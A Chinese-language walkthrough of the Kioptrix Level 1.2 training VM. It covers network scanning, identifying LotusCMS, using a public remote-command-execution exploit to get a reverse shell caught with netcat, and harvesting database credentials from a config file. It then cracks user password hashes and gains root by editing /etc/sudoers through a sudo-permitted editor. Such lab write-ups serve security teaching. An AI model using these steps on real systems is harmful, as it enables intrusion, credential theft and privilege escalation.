靶机KioptrixLevel 1.2 (#3)攻略
将Kioptrix Level 1.2虚拟机文件导入VMWARE后,并将其网卡的网络改为NAT模式(详细步骤可见其他博文)
因为不知道目标的IP地址,因此第一步就需要通过扫描网络(与攻击机器Kali Linux在同一个网络)识别出目标的IP地址:
# nmap -sn 192.168.140.0/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-04 23:37 EDT Nmap scan report for 192.168.140.1 Host is up (0.00074s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.140.2 Host is up (0.00024s latency). MAC Address: 00:50:56:EC:B5:61 (VMware) Nmap scan report for 192.168.140.146 Host is up (0.00022s latency). MAC Address: 00:0C:29:7D:68:5C (VMware) Nmap scan report for 192.168.140.254 Host is up (0.00036s latency). MAC Address: 00:50:56:E0:D4:6C (VMware) Nmap scan report for 192.168.140.138 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 2.79 seconds
然后对识别出的目标(192.168.140.146)进行完整的扫描,发现主要的运行服务是ssh以及HTTP,SSH该版本查询相关漏洞后没有啥收获,因此需要聚焦于HTTP,
# nmap -sV -sC -O -p- 192.168.140.146 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-04 23:39 EDT Nmap scan report for 192.168.140.146 Host is up (0.0011s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA) |_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) #可以知道网站是用PHP以及Apache搭建的 |_http-title: Ligoat Security - Got Goat? Security ... | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch MAC Address: 00:0C:29:7D:68:5C (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.02 seconds
虽然目标网站首页就很有个很明显的login登录链接,先手动用简单的注入语句测试一下是否存在注入漏洞,发现没有,然后用SQLMAP自动化工具扫描一下,即使把risk水平设定为3,仍然没有发现注入漏洞,因此需要果断放弃这个方向。
从网站登录来看应该有CMS,因此利用whatweb工具查看一下是什么类型的CMS
# whatweb -vv http://kioptrix3.com http://kioptrix3.com/ [200] Identifying: http://kioptrix3.com HTTP-Status: 200 [["X-Powered-By", [{:name=>"x-powered-by string", :string=>"PHP/5.2.4-2ubuntu5.6", :certainty=>100}]], ["HTTPServer", [{:os=>"Ubuntu Linux", :certainty=>100}, {:name=>"server string", :string=>"Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch", :certainty=>100}]], ["Title", [{:name=>"page title", :string=>"Ligoat Security - Got Goat? Security ...", :certainty=>100}]], ["LotusCMS", [{:certainty=>25, :text=>"<meta name=\"keywords\" content=\"LotusCMS\" />", :regexp_compiled=>/<meta\ name="keywords"\ content="LotusCMS"\ \/>/}]], ["IP", [{:string=>"192.168.140.146", :certainty=>100}]], ["Apache", [{:regexp=>["Apache"], :search=>"headers[server]", :name=>"HTTP Server Header", :regexp_compiled=>/^Apache/i, :certainty=>100}, {:version=>["2.2.8"], :search=>"headers[server]", :name=>"HTTP Server Header", :regexp_compiled=>/^Apache\/([\d\.]+)/i, :certainty=>100}]], ["Meta-Author", [{:string=>["name of author - Manjeet Singh Sawhney www.manjeetss.com"], :regexp_compiled=> /<meta[^>^=]+name[\s]*=[\s]*['"]?author['"]?[^>^=]+content[\s]*=[\s]*['"]([^'^"^>]+)/i, :certainty=>100}]], ["Cookies", [{:string=>"PHPSESSID", :certainty=>100}]], ["Country", [{:string=>"RESERVED", :module=>"ZZ", :certainty=>100}]], ["PHP", [{:version=>["5.2.4-2ubuntu5.6"], :search=>"headers[server]", :regexp_compiled=>/[^\r^\n]*PHP\/([^\s^\r^\n]+)/, :certainty=>100}, {:module=>["Suhosin-Patch"], :search=>"headers[server]", :regexp_compiled=> /[^\r^\n]*PHP\/[^\s^\r^\n]+ with (Hardening-Patch|Suhosin-Patch)/, :certainty=>100}, {:version=>["5.2.4-2ubuntu5.6"], :search=>"headers[x-powered-by]", :regexp_compiled=>/[^\r^\n]*PHP\/([^\s^\r^\n]+)/, :certainty=>100}]]] WhatWeb report for http://kioptrix3.com Status : 200 OK Title : Ligoat Security - Got Goat? Security ... IP : 192.168.140.146 Country : RESERVED, ZZ Summary : X-Powered-By[PHP/5.2.4-2ubuntu5.6], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch], maybe LotusCMS, Apache[2.2.8], Meta-Author[name of author - Manjeet Singh Sawhney www.manjeetss.com], Cookies[PHPSESSID], PHP[5.2.4-2ubuntu5.6][Suhosin-Patch] Detected Plugins: [ Apache ] The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. {:name=>"HTTP Server Header", :certainty=>100} Version : 2.2.8 (from HTTP Server Header) {:name=>"HTTP Server Header", :certainty=>100, :version=>["2.2.8"]} Google Dorks: (3) Website : http://httpd.apache.org/ [ Cookies ] Display the names of cookies in the HTTP headers. The values are not returned to save on space. String : PHPSESSID {:certainty=>100, :string=>"PHPSESSID"} [ HTTPServer ] HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS : Ubuntu Linux {:certainty=>100, :os=>"Ubuntu Linux"} String : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch (from server string) {:name=>"server string", :certainty=>100, :string=>"Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch"} [ LotusCMS ] LotusCMS (previously ArboroianCMS) brings to the forefront design and design integration into one of the most neglected CMS niches - Databaseless Web-Design and Development. Certainty : maybe {:certainty=>25} Google Dorks: (1) Website : http://www.lotuscms.org/ [ Meta-Author ] This plugin retrieves the author name from the meta name tag - info: http://www.webmarketingnow.com/tips/meta-tags-uncovered.html #author String : name of author - Manjeet Singh Sawhney www.manjeetss.com {:certainty=>100, :string=>["name of author - Manjeet Singh Sawhney www.manjeetss.com"]} [ PHP ] PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. This plugin identifies PHP errors, modules and versions and extracts the local file path and username if present. Version : 5.2.4-2ubuntu5.6 {:certainty=>100, :version=>["5.2.4-2ubuntu5.6"]} Module : Suhosin-Patch {:certainty=>100, :module=>["Suhosin-Patch"]} Version : 5.2.4-2ubuntu5.6 {:certainty=>100, :version=>["5.2.4-2ubuntu5.6"]} Google Dorks: (2) Website : http://www.php.net/ [ X-Powered-By ] X-Powered-By HTTP header String : PHP/5.2.4-2ubuntu5.6 (from x-powered-by string) {:name=>"x-powered-by string", :certainty=>100, :string=>"PHP/5.2.4-2ubuntu5.6"} HTTP Headers: HTTP/1.1 200 OK Date: Tue, 05 Apr 2022 12:00:05 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.6 Set-Cookie: PHPSESSID=cf87a15d6312411a13f5b98a81882a7c; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 1819 Connection: close Content-Type: text/html
基本上可以确认该网站CMS为LotusCMS,查看LotusCMS有什么漏洞:
# searchsploit LotusCMS ---------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------- --------------------------------- LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit) | php/remote/18565.rb LotusCMS 3.0.3 - Multiple Vulnerabilities | php/webapps/16982.txt ---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
从Github查找该exploit,并下载到Kali Linux本地:
# git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit.git Cloning into 'LotusCMS-Exploit'... remote: Enumerating objects: 14, done. remote: Total 14 (delta 0), reused 0 (delta 0), pack-reused 14 Receiving objects: 100% (14/14), 4.36 KiB | 318.00 KiB/s, done. Resolving deltas: 100% (3/3), done. ┌──(root💀kali)-[~] └─# ls 10.c geckodriver-v0.30.0-linux32.tar.gz linux-explorer Ooise Templates 9542.c go Log4jUnifi php-reverse-shell Vaccient_htb arping1.sh impacket loot Pictures Videos cupp jason.exe LotusCMS-Exploit privilege-escalation-awesome-scripts-suite winPEASx64.exe Desktop kioptrix LotusCMS-Exploit.git Public winPEASx86.exe Documents kioptrix_login.txt Music rogue-jndi winshell_jason.ps1 Downloads kio.txt NetfilterQueue-1.0.0 samba_jason geckodriver linenum.sh NetfilterQueue-1.0.0.tar.gz starting_point_jasonhuawen.ovpn ┌──(root💀kali)-[~] └─# cd LotusCMS-Exploit ┌──(root💀kali)-[~/LotusCMS-Exploit] └─# ls lotusRCE.rb lotusRCE.sh README.md
查看一下lotusRCE.sh文件,该shell脚本需要传递位置参数(也就是目标的地址),执行该脚本,成功拿到shell(虽然权限比较低:www-data)
─# nc -nlvp 1234 listening on [any] 1234 ... connect to [192.168.140.138] from (UNKNOWN) [192.168.140.146] 60341 ls cache core data favicon.ico gallery gnu-lgpl.txt index.php modules style update.php whoami www-data
既然进入了shell,看能不能找到用户名密码信息,经过一番搜罗在gallery目录中有个gconfig文件,打开看一下:
cat gconfig.php <?php error_reporting(0); /* A sample Gallarific configuration file. You should edit the installer details below and save this file as gconfig.php Do not modify anything else if you don't know what it is. */ // Installer Details ----------------------------------------------- // Enter the full HTTP path to your Gallarific folder below, // such as http://www.yoursite.com/gallery // Do NOT include a trailing forward slash $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery"; $GLOBALS["gallarific_mysql_server"] = "localhost"; $GLOBALS["gallarific_mysql_database"] = "gallery"; $GLOBALS["gallarific_mysql_username"] = "root"; $GLOBALS["gallarific_mysql_password"] = "fuckeyou"; // Setting Details ------------------------------------------------- if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) { echo("A connection to the database couldn't be established: " . mysql_error()); die(); }else { if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) { echo("The Gallarific database couldn't be opened: " . mysql_error()); die(); }else { $settings=mysql_query("select * from gallarific_settings"); if(mysql_num_rows($settings)!=0){ while($data=mysql_fetch_array($settings)){ $GLOBALS["{$data['settings_name']}"]=$data['settings_value']; } } } } ?>
用Nikto扫描,发现有phpmyadmin目录,利用上面得到的用户名以及密码登录:
─# nikto -host 192.168.140.146 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.140.146 + Target Hostname: 192.168.140.146 + Target Port: 80 + Start Time: 2022-04-05 00:17:29 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch + Cookie PHPSESSID created without the httponly flag + Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch. + Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun 5 15:22:00 2009 + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
在数据库中发现存在两个用户的用户名以及hash以后的密码:
dreg 0d3eccfb887aabd50f243b3f155c0f85 (在线破解后为Mast3r,速度非常快)
loneferret 5badcaf789d3d1d09794d8f021f40f0e (在线破解后starwars,速度非常快)
用该用户名ssh登录目标机器,查看是否有sudo权限:
loneferret@Kioptrix3:~$ sudo -l User loneferret may run the following commands on this host: (root) NOPASSWD: !/usr/bin/su (root) NOPASSWD: /usr/local/bin/ht (root) NOPASSWD: /bin/bash
此处不能直接进行sudo,需要添加命令
export TERM=xterm-color sudo /usr/local/bin/ht
在ht编辑器里编辑/etc/sudoers文件,给loneferret用户增加/bin/bash
退出ht编辑器
此时sudo /bin/bash即可拿到root权限
loneferret@Kioptrix3:~$ sudo /bin/bash root@Kioptrix3:~#
STRIVE FOR PROGRESS,NOT FOR PERFECTION
